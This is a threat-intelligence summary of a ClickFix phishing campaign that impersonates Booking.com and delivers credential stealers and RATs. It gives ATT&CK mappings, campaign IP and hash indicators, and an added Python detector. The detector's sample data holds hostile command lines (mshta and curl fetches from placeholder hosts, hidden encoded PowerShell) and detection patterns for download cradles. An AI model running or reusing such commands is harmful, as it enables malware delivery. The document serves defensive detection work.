Phishing campaign impersonates Booking.com, delivers a suite of credential-stealing malware

Microsoft Threat Intelligence has identified a phishing campaign impersonating Booking.com that targets organizations in the hospitality industry. Using the ClickFix social engineering technique, the campaign tricks victims into running malware themselves and delivers a range of credential stealers and remote access trojans in support of credential theft and financial fraud, with targets in North America, Oceania, Asia and Europe. Affected: hospitality industry, Booking.com users

Key points:

  • Microsoft Threat Intelligence identified a phishing campaign impersonating Booking.com and targeting organizations in the hospitality industry.
  • The campaign uses the ClickFix social engineering technique: a fake error or CAPTCHA page instructs the victim to copy a command and paste it into the Windows Run dialog, so the victim executes the malware themselves.
  • Lure emails are sent to individuals likely to work with Booking.com and lead to a fake verification page that prompts them to run the command that installs the malware.
  • Microsoft attributes the activity to the threat actor it tracks as Storm-1865; the campaign began in December 2024 and was ongoing as of February 2025.
  • Targets are located in North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe.
  • Payloads observed include XWorm, Lumma Stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT.
  • Recommendations include multi-factor authentication using phishing-resistant methods, user education on phishing and ClickFix-style lures, and hunting for the indicators listed below.

MITRE ATT&CK Techniques:

  • T1071.001 – Application Layer Protocol: Web Protocols: the delivered malware uses HTTP(S) for command and control (C2) communications.
  • T1204.002 – User Execution: Malicious File: the victim is socially engineered into running the payload; in ClickFix the user pastes a copied command into the Windows Run dialog (ATT&CK v16 added T1204.004, Malicious Copy and Paste, which describes this step directly).
  • T1203 – Exploitation for Client Execution: listed for delivery via malicious documents or web pages; note that ClickFix relies on the user executing the pasted command, not on a software vulnerability, so T1204 is the more precise mapping for this campaign.
  • T1060 – Registry Run Keys / Startup Folder (revoked ID, now T1547.001 under Boot or Logon Autostart Execution): the malware persists across reboots by adding Run key entries.
  • T1064 – Scripting (deprecated ID, now T1059 Command and Scripting Interpreter, e.g. T1059.001 PowerShell and T1059.007 JavaScript): scripts are used to stage and execute the malware.
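The ClickFix step described above leaves two host artifacts a defender can hunt for: a process-creation event in which explorer.exe (the parent of anything launched from the Run dialog) spawns a LOLBin such as mshta.exe or powershell.exe with a URL or encoded payload on the command line, and the pasted text itself, which Explorer persists under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The following script is an added example written for this page, not code from Microsoft or from the original article; the event records and RunMRU values it scans are constructed to mimic Sysmon Event ID 1 fields and RunMRU entries, and the domain and IP in them are placeholders, not indicators from the campaign.

```python
"""Heuristic detection of ClickFix-style execution (T1204.002 / T1204.004).

Two checks over constructed sample data:
  1. process-creation events: explorer.exe -> LOLBin with remote/obfuscated args
  2. RunMRU values: the text typed into Win+R, persisted by Explorer
"""
import json
import re
from dataclasses import dataclass

# LOLBins a pasted ClickFix command typically launches.
SUSPICIOUS_IMAGES = {
    "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "msiexec.exe", "curl.exe", "bitsadmin.exe", "certutil.exe",
}

# Command-line features pointing at a remote fetch or obfuscation.
CMDLINE_PATTERNS = [
    re.compile(r"https?://", re.I),                                   # remote payload
    re.compile(r"\b(iex|invoke-expression|invoke-webrequest|iwr|downloadstring|downloadfile)\b", re.I),
    re.compile(r"-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}", re.I),  # base64 PowerShell
    re.compile(r"-w(indowstyle)?\s+h(idden)?", re.I),                 # hidden window
]

# Constructed sample telemetry (Sysmon EID 1 style, JSON lines). Not campaign data.
SAMPLE_EVENTS_JSONL = r"""
{"RecordId": "1", "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta https://verify.example.invalid/captcha.hta"}
{"RecordId": "2", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AA=="}
{"RecordId": "3", "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe report.txt"}
{"RecordId": "4", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Deploy\\agent.exe", "CommandLine": "powershell -File C:\\scripts\\inventory.ps1"}
"""

# Constructed RunMRU values (Explorer appends "\1" to each stored string). Not campaign data.
SAMPLE_RUNMRU = {
    "a": "mshta https://verify.example.invalid/captcha.hta\\1",
    "b": "notepad\\1",
    "c": "cmd /c curl -s http://203.0.113.10/x | more\\1",
}


@dataclass
class Finding:
    record_id: str
    reason: str


def image_name(path: str) -> str:
    """Basename of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def load_events(jsonl: str) -> list:
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def check_process_event(ev: dict):
    """Return a Finding if the event matches the ClickFix launch pattern, else None."""
    img = image_name(ev.get("Image", ""))
    parent = image_name(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    # The Run dialog is hosted by explorer.exe, so that parent is the anchor.
    if parent != "explorer.exe" or img not in SUSPICIOUS_IMAGES:
        return None
    hits = [p.pattern for p in CMDLINE_PATTERNS if p.search(cmd)]
    if not hits:
        return None
    return Finding(ev.get("RecordId", "?"),
                   f"{img} spawned by explorer.exe with {len(hits)} suspicious indicator(s)")


def scan_process_events(events: list) -> list:
    return [f for f in (check_process_event(e) for e in events) if f is not None]


def check_runmru(entries: dict) -> list:
    """Flag RunMRU strings that invoke a LOLBin with remote or obfuscated arguments."""
    findings = []
    for name, value in entries.items():
        text = value[:-2] if value.endswith("\\1") else value   # strip Explorer's "\1" marker
        tokens = text.split()
        first = tokens[0].lower() if tokens else ""
        exe = first if first.endswith(".exe") else first + ".exe"  # "mshta" and "mshta.exe" both count
        if exe in SUSPICIOUS_IMAGES and any(p.search(text) for p in CMDLINE_PATTERNS):
            findings.append(Finding(f"RunMRU\\{name}", f"pasted command: {text[:60]}"))
    return findings


if __name__ == "__main__":
    for f in scan_process_events(load_events(SAMPLE_EVENTS_JSONL)) + check_runmru(SAMPLE_RUNMRU):
        print(f"[ClickFix] {f.record_id}: {f.reason}")
```

On real hosts the RunMRU values come from the registry (for example via PowerShell's Get-ItemProperty on the key above) and the process events from Sysmon or Event ID 4688 with command-line auditing enabled; the heuristics are deliberately narrow (explorer.exe parent plus a remote or obfuscated argument) so that ordinary Run-dialog use such as launching notepad does not fire.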

Indicators of Compromise:

  • [IP Address] 92.255.57.155
  • [IP Address] 147.45.44.131
  • [IP Address] 176.113.115.170
  • [IP Address] 31.177.110.99
  • [IP Address] 185.7.214.54
  • [File hash (SHA-256)] 01ec22c3394eb1661255d2cc646db70a66934c979c2c2d03df10127595dc76a6
  • [File hash (SHA-256)] f87600e4df299d51337d0751bcf9f07966282be0a43bfa3fd237bf50471a981e
  • [File hash (SHA-256)] 0c96efbde64693bde72f18e1f87d2e2572a334e222584a1948df82e7dcfe241d

Full Story: https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/